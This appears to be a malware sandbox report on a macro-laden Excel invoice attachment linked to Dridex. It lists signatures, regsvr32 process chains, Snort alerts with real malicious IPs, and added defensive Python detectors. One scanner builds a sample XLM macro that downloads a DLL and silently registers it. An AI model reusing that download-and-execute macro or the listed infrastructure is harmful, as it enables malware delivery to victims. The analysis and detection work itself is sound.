
Analysis Report 1_Total New Invoices-Thursday January 21_2021.xlsm

Overview

General Information

Sample Name: 1_Total New Invoices-Thursday January 21_2021.xlsm
Analysis ID: 342716
MD5: a52a88ae97dd408d38d98c9aa7f81142
SHA1: 234b65bc42a077c98c61a8eb4870d41e0039013e
SHA256: c7e6848fd63681514d6dad3032e358a257dde3aa1cd3b349306283356bca2608

Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Multi AV Scanner detection for submitted file
Sigma detected: BlueMashroom DLL Load
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Anomaly
Abnormal high CPU Usage
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Is looking for software installed on the system
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the installation date of Windows
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
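
The "Hidden Macro 4.0" verdict and the "Found Excel 4.0 Macro with suspicious formulas" signature rest on three facts about an OOXML workbook: a part whose content type is an Excel macro sheet, a sheet entry in xl/workbook.xml whose state is hidden or veryHidden that points at that part, and XLM functions such as EXEC or CALL on the sheet. The following is an added example, not code from the report or from Joe Sandbox, that checks all three. The workbook it scans is built inline by build_sample_xlsm() for the demonstration and is not the analysed sample; the SUSPICIOUS_FUNCS list is an assumed, non-exhaustive set.

```python
"""Scan an OOXML workbook for Excel 4.0 (XLM) macro sheets that are hidden
or veryHidden and for the XLM functions maldocs lean on.

Added example, not code from the report or from Joe Sandbox. The workbook
built by build_sample_xlsm() is constructed inline for the demonstration;
it is not the analysed sample."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS_MAIN = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
NS_PKG_REL = "http://schemas.openxmlformats.org/package/2006/relationships"
NS_CT = "http://schemas.openxmlformats.org/package/2006/content-types"
MACROSHEET_CT = "application/vnd.ms-excel.macrosheet+xml"
# XLM functions worth flagging on a macro sheet (an assumed, non-exhaustive list)
SUSPICIOUS_FUNCS = ("EXEC", "CALL", "REGISTER", "FORMULA", "RUN", "HALT")


def scan_workbook(data: bytes) -> dict:
    """Return macro-sheet parts, hidden XLM sheets and suspicious formulas found in the package."""
    out = {"macrosheets": [], "hidden_xlm_sheets": [], "suspicious_formulas": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        # 1. macro sheets are identified by content type, not by file name
        ct = ET.fromstring(z.read("[Content_Types].xml"))
        for ov in ct.iter(f"{{{NS_CT}}}Override"):
            if ov.get("ContentType") == MACROSHEET_CT:
                out["macrosheets"].append(ov.get("PartName"))
        # 2. map each sheet's r:id to its part so the hidden state can be tied to a macro sheet
        rels = ET.fromstring(z.read("xl/_rels/workbook.xml.rels"))
        rid_to_part = {r.get("Id"): "/xl/" + r.get("Target").lstrip("/")
                       for r in rels.iter(f"{{{NS_PKG_REL}}}Relationship")}
        wb = ET.fromstring(z.read("xl/workbook.xml"))
        for sh in wb.iter(f"{{{NS_MAIN}}}sheet"):
            state = sh.get("state", "visible")
            part = rid_to_part.get(sh.get(f"{{{NS_R}}}id"))
            if part in out["macrosheets"] and state != "visible":
                out["hidden_xlm_sheets"].append((sh.get("name"), state))
        # 3. look at every formula on every macro sheet
        for part in out["macrosheets"]:
            ms = ET.fromstring(z.read(part.lstrip("/")))
            for f in ms.iter(f"{{{NS_MAIN}}}f"):
                text = f.text or ""
                for fn in SUSPICIOUS_FUNCS:
                    if re.search(rf"\b{fn}\s*\(", text, re.I):
                        out["suspicious_formulas"].append((part, fn, text))
    return out


def build_sample_xlsm(macro_state: str = "veryHidden") -> bytes:
    """Constructed minimal .xlsm: one visible worksheet plus one XLM macro sheet."""
    content_types = f'''<Types xmlns="{NS_CT}">
  <Override PartName="/xl/workbook.xml" ContentType="application/vnd.ms-excel.sheet.macroEnabled.main+xml"/>
  <Override PartName="/xl/worksheets/sheet1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/macrosheets/sheet1.xml" ContentType="{MACROSHEET_CT}"/>
</Types>'''
    rels = f'''<Relationships xmlns="{NS_PKG_REL}">
  <Relationship Id="rId1" Type="{NS_R}/worksheet" Target="worksheets/sheet1.xml"/>
  <Relationship Id="rId2" Type="http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet" Target="macrosheets/sheet1.xml"/>
</Relationships>'''
    workbook = f'''<workbook xmlns="{NS_MAIN}" xmlns:r="{NS_R}">
  <sheets>
    <sheet name="Invoice" sheetId="1" r:id="rId1"/>
    <sheet name="Macro1" sheetId="2" state="{macro_state}" r:id="rId2"/>
  </sheets>
</workbook>'''
    # constructed XLM payload: download a DLL, register it silently, stop
    macrosheet = f'''<xm:macrosheet xmlns="{NS_MAIN}" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
  <sheetData>
    <row r="1"><c r="A1"><f>CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://example.invalid/p","C:\\Users\\Public\\p.dll",0,0)</f></c></row>
    <row r="2"><c r="A2"><f>EXEC("regsvr32.exe -s C:\\Users\\Public\\p.dll")</f></c></row>
    <row r="3"><c r="A3"><f>HALT()</f></c></row>
  </sheetData>
</xm:macrosheet>'''
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("xl/_rels/workbook.xml.rels", rels)
        z.writestr("xl/workbook.xml", workbook)
        z.writestr("xl/worksheets/sheet1.xml", f'<worksheet xmlns="{NS_MAIN}"><sheetData/></worksheet>')
        z.writestr("xl/macrosheets/sheet1.xml", macrosheet)
    return buf.getvalue()


if __name__ == "__main__":
    for key, value in scan_workbook(build_sample_xlsm()).items():
        print(key, value)
```

Identifying macro sheets by content type rather than by the xl/macrosheets/ path matters because the path is only a convention; the relationship map is what lets a veryHidden state be attributed to the macro sheet rather than to an ordinary hidden worksheet. Formulas stored as cached text or built at runtime with FORMULA() will not all be visible statically, which is why the sandbox's dynamic signatures still carry weight.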

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2432 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2440 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2328 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2692 cmdline: -s C:\Users\user\AppData\Local\Temp\kxwni.dll MD5: 432BE6CF7311062633459EEF6B242FB5)
    • regsvr32.exe (PID: 1980 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\uveoybvk.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2780 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2920 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2464 cmdline: -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll MD5: 432BE6CF7311062633459EEF6B242FB5)
    • regsvr32.exe (PID: 3036 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2964 cmdline: -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll MD5: 432BE6CF7311062633459EEF6B242FB5)
    • regsvr32.exe (PID: 2452 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jxacpz.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2496 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1236 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 912 cmdline: -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll MD5: 432BE6CF7311062633459EEF6B242FB5)
    • regsvr32.exe (PID: 2852 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2828 cmdline: -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: BlueMashroom DLL Load
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll, CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2432, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll, ProcessId: 2440
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team | Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll, CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2432, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll, ProcessId: 2440
Sigma detected: Regsvr32 Anomaly
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll, CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2432, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll, ProcessId: 2440
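
The process chain in the Startup tree (EXCEL.EXE spawning regsvr32.exe -s on a DLL in the user's Temp directory, which in turn spawns a second regsvr32.exe with only "-s <dll>" as its command line) is exactly what the three Sigma rules above key on. The following is an added example, not code from the report or from the Sigma project: simplified re-implementations of those checks, run over process-creation events constructed from the Startup tree's PIDs and command lines plus one benign control event. The SysWOW64 image path given to the nested regsvr32.exe (PID 2692) is an assumption; the report records only its MD5, which differs from the parent's, and that nesting is consistent with the 64-bit regsvr32.exe handing a 32-bit DLL to its 32-bit copy.

```python
"""Sigma-style checks replayed over the Office -> regsvr32 chain from the
report's Startup tree.

Added example, not code from the report or from the Sigma project. Events
are constructed from the report's Startup tree (PIDs, images, command
lines) plus one benign control event; the record layout is Sysmon-like
but is an assumption, not a specific log format."""
import re
from dataclasses import dataclass

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
# LOLBins and shells that an Office process has no legitimate reason to spawn
SHELL_LIKE = {"regsvr32.exe", "rundll32.exe", "cmd.exe", "powershell.exe",
              "wscript.exe", "cscript.exe", "mshta.exe", "certutil.exe"}
# Directories a standard user can write to; a DLL registered from here is suspect
USER_WRITABLE = re.compile(r"\\(?:Users\\[^\\]+\\AppData\\|Users\\Public\\|ProgramData\\|Windows\\Temp\\)", re.I)
SILENT_FLAG = re.compile(r"(?:^|\s)[-/]s(?=\s|$)", re.I)


@dataclass
class ProcEvent:
    pid: int
    parent_pid: int
    image: str      # full path of the new process
    cmdline: str    # command line as logged


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def office_spawns_shell(ev: ProcEvent, by_pid: dict) -> bool:
    parent = by_pid.get(ev.parent_pid)
    return (parent is not None
            and basename(parent.image) in OFFICE_IMAGES
            and basename(ev.image) in SHELL_LIKE)


def regsvr32_anomaly(ev: ProcEvent) -> bool:
    # silent (-s) registration of a DLL that sits in a user-writable directory
    if basename(ev.image) != "regsvr32.exe":
        return False
    return bool(SILENT_FLAG.search(ev.cmdline)) and bool(USER_WRITABLE.search(ev.cmdline))


def regsvr32_self_spawn(ev: ProcEvent, by_pid: dict) -> bool:
    # regsvr32 spawning regsvr32 with a bare "-s <dll>" command line, as seen when
    # the 64-bit copy re-launches the 32-bit one for a 32-bit DLL
    parent = by_pid.get(ev.parent_pid)
    if parent is None or basename(parent.image) != "regsvr32.exe":
        return False
    return basename(ev.image) == "regsvr32.exe" and ev.cmdline.lstrip().startswith(("-", "/"))


def evaluate(events) -> dict:
    """Return {pid: [rule names that fired]} for every event that fired at least one rule."""
    by_pid = {e.pid: e for e in events}
    alerts = {}
    for ev in events:
        fired = []
        if office_spawns_shell(ev, by_pid):
            fired.append("office_spawns_shell")
        if regsvr32_anomaly(ev):
            fired.append("regsvr32_anomaly")
        if regsvr32_self_spawn(ev, by_pid):
            fired.append("regsvr32_self_spawn")
        if fired:
            alerts[ev.pid] = fired
    return alerts


EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
REGSVR32 = r"C:\Windows\System32\regsvr32.exe"
REGSVR32_WOW = r"C:\Windows\SysWOW64\regsvr32.exe"   # assumed image of the nested copy (report gives only its MD5)
DLL = r"C:\Users\user\AppData\Local\Temp\kxwni.dll"

# Constructed from the report's Startup tree (PIDs and command lines), plus a benign control
SAMPLE_EVENTS = [
    ProcEvent(2432, 1000, EXCEL, f"'{EXCEL}' /automation -Embedding"),
    ProcEvent(2440, 2432, REGSVR32, f"'{REGSVR32}' -s {DLL}"),
    ProcEvent(2328, 2432, REGSVR32, f"'{REGSVR32}' -s {DLL}"),
    ProcEvent(2692, 2328, REGSVR32_WOW, f"-s {DLL}"),
    # control: an installer registering a vendor DLL from Program Files must not fire
    ProcEvent(4000, 600, r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\msiexec.exe /V"),
    ProcEvent(5000, 4000, REGSVR32, r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'),
]

if __name__ == "__main__":
    for pid, rules in evaluate(SAMPLE_EVENTS).items():
        print(pid, rules)
```

The parent lookup is by PID within one batch of events; on a real host, PIDs are reused, so a production rule must key on the parent process GUID or creation time as Sysmon does. The control event shows why the user-writable-path condition is in the regsvr32 check: "/s" alone fires on every MSI-driven COM registration.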

Signature Overview


AV Detection:

Multi AV Scanner detection for submitted file
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm | Virustotal: Detection: 27%

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49181 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49185 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49190 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49194 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49198 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49202 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49206 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49211 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49214 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49220 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49222 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49228 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49229 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49235 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49237 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49239 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49247 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49250 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49251 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49259 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49263 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49264 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49265 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49270 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49275 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49281 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49282 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49288 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49294 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49298 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49300 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49302 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49307 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49314 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49318 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49319 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49320 version: TLS 1.0
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Uses secure TLS version for HTTPS connections
Source: unknown | HTTPS traffic detected: 64.37.52.172:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 103.83.81.27:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 198.136.54.91:443 -> 192.168.2.22:49184 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 192.185.224.50:443 -> 192.168.2.22:49191 version: TLS 1.2
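
The "version: TLS 1.0" value recorded above for every session to 194.225.58.214:443 is the version the server selected, which on the wire is carried in its ServerHello (for TLS 1.3 the legacy field still reads 0x0303 and the real selection moves to the supported_versions extension). The following is an added example, not code from the report or from Joe Sandbox, that pulls the negotiated version out of a ServerHello record and flags anything below TLS 1.2. The records it parses are constructed by build_server_hello() and are not captured traffic; the TLS 1.2 floor is a policy choice for the example.

```python
"""Read the negotiated protocol version out of a TLS ServerHello and flag
anything below TLS 1.2.

Added example, not code from the report or from Joe Sandbox. The records
are constructed with build_server_hello(); they are not captured traffic."""
import struct

VERSION_NAMES = {0x0300: "SSL 3.0", 0x0301: "TLS 1.0", 0x0302: "TLS 1.1",
                 0x0303: "TLS 1.2", 0x0304: "TLS 1.3"}
MIN_ACCEPTABLE = 0x0303          # policy choice for this example: TLS 1.2 or better
EXT_SUPPORTED_VERSIONS = 0x002B  # RFC 8446: TLS 1.3 signals its version here, not in the legacy field
HANDSHAKE, SERVER_HELLO = 0x16, 0x02


def negotiated_version(record: bytes) -> int:
    """Parse one TLS record carrying a ServerHello; return the selected version as 0xMMmm."""
    if len(record) < 5 or record[0] != HANDSHAKE:
        raise ValueError("not a TLS handshake record")
    rec_len = struct.unpack("!H", record[3:5])[0]
    hs = record[5:5 + rec_len]
    if len(hs) < 4 or hs[0] != SERVER_HELLO:
        raise ValueError("not a ServerHello")
    body = hs[4:4 + int.from_bytes(hs[1:4], "big")]
    version = struct.unpack("!H", body[0:2])[0]   # legacy_version / server_version
    pos = 2 + 32                                  # skip random
    pos += 1 + body[pos]                          # session_id (length-prefixed)
    pos += 2 + 1                                  # cipher_suite, compression_method
    if pos + 2 <= len(body):                      # extensions block is optional
        ext_len = struct.unpack("!H", body[pos:pos + 2])[0]
        pos += 2
        end = pos + ext_len
        while pos + 4 <= end:
            etype, elen = struct.unpack("!HH", body[pos:pos + 4])
            pos += 4
            if etype == EXT_SUPPORTED_VERSIONS and elen == 2:
                version = struct.unpack("!H", body[pos:pos + 2])[0]
            pos += elen
    return version


def classify(record: bytes) -> dict:
    """Human-readable version plus an 'insecure' verdict against MIN_ACCEPTABLE."""
    v = negotiated_version(record)
    return {"version": VERSION_NAMES.get(v, f"unknown({v:#06x})"), "insecure": v < MIN_ACCEPTABLE}


def build_server_hello(version: int, extensions: bytes = b"", cipher_suite: int = 0xC013) -> bytes:
    """Constructed ServerHello inside a handshake record (zeroed random, empty session id)."""
    body = struct.pack("!H", version) + bytes(32) + b"\x00" + struct.pack("!H", cipher_suite) + b"\x00"
    if extensions:
        body += struct.pack("!H", len(extensions)) + extensions
    hs = bytes([SERVER_HELLO]) + len(body).to_bytes(3, "big") + body
    # the record-layer version is a legacy value and must not be read as the negotiated one
    return bytes([HANDSHAKE]) + struct.pack("!H", 0x0301) + struct.pack("!H", len(hs)) + hs


def supported_versions_ext(selected: int) -> bytes:
    """Constructed supported_versions extension as it appears in a TLS 1.3 ServerHello."""
    data = struct.pack("!H", selected)
    return struct.pack("!HH", EXT_SUPPORTED_VERSIONS, len(data)) + data


if __name__ == "__main__":
    print(classify(build_server_hello(0x0301)))
    print(classify(build_server_hello(0x0303)))
    print(classify(build_server_hello(0x0303, supported_versions_ext(0x0304))))
```

Three different version fields appear in a handshake and only one is the answer: the record-layer version is a compatibility value, the ClientHello version is the client's ceiling, and the ServerHello is the selection. A detector that reads the record header would report TLS 1.0 for almost every modern session, and one that ignores supported_versions would report TLS 1.2 for every TLS 1.3 session.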

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\kxwni.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: l3v7tq4[1].rar.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe
Source: global traffic | DNS query: name: qsf.surfescape.net
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 64.37.52.172:443
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 64.37.52.172:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49170
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49171
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49173
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49173
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49174
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49175
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49176
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49178
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49179
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49179
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49181
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49182
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49183
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49183
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49185
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49187
